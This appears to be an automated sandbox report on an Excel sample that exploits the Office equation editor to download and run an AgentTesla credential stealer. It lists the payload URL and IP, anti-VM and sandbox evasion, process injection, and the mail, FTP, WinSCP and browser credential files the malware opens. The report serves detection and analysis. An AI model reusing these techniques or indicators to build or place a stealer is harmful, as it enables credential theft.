Source: 5.0.vbc.exe.8c0000.6.unpack, va/x0.cs .Net Code: eQb System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
.NET source code contains method to dynamically call methods (often used by packers)
Source: vbc.exe.2.dr, Oz/uT.cs .Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: vbc[1].exe.2.dr, Oz/uT.cs .Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 4.2.vbc.exe.8c0000.1.unpack, Oz/uT.cs .Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 4.0.vbc.exe.8c0000.0.unpack, Oz/uT.cs .Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 5.0.vbc.exe.8c0000.10.unpack, Oz/uT.cs .Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 5.0.vbc.exe.8c0000.8.unpack, Oz/uT.cs .Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 5.0.vbc.exe.8c0000.3.unpack, Oz/uT.cs .Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 5.0.vbc.exe.8c0000.4.unpack, Oz/uT.cs .Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 5.0.vbc.exe.8c0000.2.unpack, Oz/uT.cs .Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 5.0.vbc.exe.8c0000.6.unpack, Oz/uT.cs .Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\Public\vbc.exe Code function: 5_2_00781870 push esp; retn 002Dh 5_2_00781871
Source: C:\Users\Public\vbc.exe Code function: 5_2_00782ED8 pushad ; iretd 5_2_00782ED9
Source: C:\Users\Public\vbc.exe Code function: 5_2_00781880 pushad ; retn 002Dh 5_2_007818C5

Persistence and Installation Behavior
barindex
Drops PE files
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Drops PE files to the user directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file

Boot Survival
barindex
Drops PE files to the user root directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Yara detected AntiVM3
Source: Yara match File source: 4.2.vbc.exe.24d5ea4.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.2534e8c.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000002.475542322.0000000002491000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.475600602.0000000002520000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: vbc.exe PID: 2240, type: MEMORYSTR
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: vbc.exe, 00000004.00000002.475542322.0000000002491000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.475600602.0000000002520000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
Source: vbc.exe, 00000004.00000002.475542322.0000000002491000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.475600602.0000000002520000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Source: C:\Users\Public\vbc.exe WMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Users\Public\vbc.exe WMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2032 Thread sleep time: -300000s >= -30000s Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2544 Thread sleep time: -36461s >= -30000s Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 1952 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2116 Thread sleep time: -300000s >= -30000s Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 408 Thread sleep time: -8301034833169293s >= -30000s Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 408 Thread sleep time: -120000s >= -30000s Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 1928 Thread sleep count: 9494 > 30 Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 408 Thread sleep count: 111 > 30 Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 1928 Thread sleep count: 246 > 30 Jump to behavior
Contains long sleeps (>= 3 min)
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\Public\vbc.exe Window / User API: threadDelayed 9494 Jump to behavior
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Users\Public\vbc.exe WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Source: C:\Users\Public\vbc.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\Public\vbc.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 36461 Jump to behavior
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 30000 Jump to behavior
Source: vbc.exe, 00000004.00000002.475600602.0000000002520000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
Source: vbc.exe, 00000005.00000002.668907940.000000000061D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: !bqnrBzDfMzbzuUrHfqQEmuMLnIDuCnyDed.exe
Source: vbc.exe, 00000004.00000002.475542322.0000000002491000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.475822749.0000000003499000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000000.471469484.0000000000402000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.668828373.0000000000402000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: OriginalFilenameqnrBzDfMzbzuUrHfqQEmuMLnIDuCnyDed.exe4
Source: vbc.exe, 00000004.00000002.475822749.0000000003499000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000000.468099336.0000000000402000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.668907940.000000000061D000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000005.00000000.471469484.0000000000402000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.668828373.0000000000402000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: qnrBzDfMzbzuUrHfqQEmuMLnIDuCnyDed.exe
Source: vbc.exe, 00000004.00000002.475600602.0000000002520000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: vbc.exe, 00000004.00000002.475600602.0000000002520000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmware
Source: vbc.exe, 00000005.00000002.668907940.000000000061D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: `!bqnrbzdfmzbzuurhfqqemumlniducnyded.exe
Source: vbc.exe, 00000005.00000002.668728779.0000000000270000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 4cqnrBzDfMzbzuUrHfqQEmuMLnIDuCnyDed$'w
Source: vbc.exe, 00000005.00000002.668907940.000000000061D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: qnrbzdfmzbzuurhfqqemumlniducnyded.exe
Source: vbc.exe, 00000004.00000002.475542322.0000000002491000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.475822749.0000000003499000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000000.471469484.0000000000402000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.668828373.0000000000402000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: InternalNameqnrBzDfMzbzuUrHfqQEmuMLnIDuCnyDed.exe(
Source: vbc.exe, 00000004.00000002.475822749.0000000003499000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000000.468099336.0000000000402000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.668907940.000000000061D000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000005.00000000.471469484.0000000000402000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.668728779.0000000000270000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.668828373.0000000000402000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: qnrBzDfMzbzuUrHfqQEmuMLnIDuCnyDed
Source: vbc.exe, 00000004.00000002.475600602.0000000002520000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools

Anti Debugging
barindex
Enables debug privileges
Source: C:\Users\Public\vbc.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Injects a PE file into a foreign processes
Source: C:\Users\Public\vbc.exe Memory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe" Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe Jump to behavior

Language, Device and Operating System Detection
barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\Public\vbc.exe Queries volume information: C:\Users\Public\vbc.exe VolumeInformation Jump to behavior
Source: C:\Users\Public\vbc.exe Queries volume information: C:\Users\Public\vbc.exe VolumeInformation Jump to behavior
Source: C:\Users\Public\vbc.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation Jump to behavior
Source: C:\Users\Public\vbc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected AgentTesla
Source: Yara match File source: 5.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.vbc.exe.400000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.vbc.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.vbc.exe.400000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.34f3920.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.vbc.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.3529940.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.34f3920.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.3529940.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000000.468099336.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.471469484.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.471126039.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.469116733.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.668828373.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.475822749.0000000003499000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.669188276.0000000002281000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.669256478.0000000002324000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: vbc.exe PID: 2240, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: vbc.exe PID: 2408, type: MEMORYSTR
Tries to steal Mail credentials (via file / registry access)
Source: C:\Users\Public\vbc.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior
Source: C:\Users\Public\vbc.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities Jump to behavior
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions Jump to behavior
Tries to harvest and steal ftp login credentials
Source: C:\Users\Public\vbc.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\ Jump to behavior
Source: C:\Users\Public\vbc.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\Public\vbc.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\Public\vbc.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: 00000005.00000002.669188276.0000000002281000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.669256478.0000000002324000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: vbc.exe PID: 2408, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected AgentTesla
Source: Yara match File source: 5.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.vbc.exe.400000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.vbc.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.vbc.exe.400000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.34f3920.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.vbc.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.3529940.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.34f3920.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.3529940.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000000.468099336.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.471469484.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.471126039.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.469116733.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.668828373.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.475822749.0000000003499000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.669188276.0000000002281000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.669256478.0000000002324000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: vbc.exe PID: 2240, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: vbc.exe PID: 2408, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 562302 Sample: 2nd order.xlsx Startdate: 28/01/2022 Architecture: WINDOWS Score: 100 34 Found malware configuration 2->34 36 Malicious sample detected (through community Yara rule) 2->36 38 Antivirus detection for URL or domain 2->38 40 14 other signatures 2->40 7 EQNEDT32.EXE 12 2->7         started        12 EXCEL.EXE 33 25 2->12         started        process3 dnsIp4 24 198.12.127.213, 49167, 80 AS-COLOCROSSINGUS United States 7->24 20 C:\Users\user\AppData\Local\...\vbc[1].exe, PE32 7->20 dropped 22 C:\Users\Public\vbc.exe, PE32 7->22 dropped 42 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 7->42 14 vbc.exe 1 5 7->14         started        file5 signatures6 process7 signatures8 44 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 14->44 46 Machine Learning detection for dropped file 14->46 48 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 14->48 50 Injects a PE file into a foreign processes 14->50 17 vbc.exe 12 2 14->17         started        process9 signatures10 26 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 17->26 28 Tries to steal Mail credentials (via file / registry access) 17->28 30 Tries to harvest and steal ftp login credentials 17->30 32 Tries to harvest and steal browser information (history, passwords, etc) 17->32
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
198.12.127.213
 unknown United States
36352 AS-COLOCROSSINGUS true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://198.12.127.213/400/vbc.exe true
  • Avira URL Cloud: safe
 unknown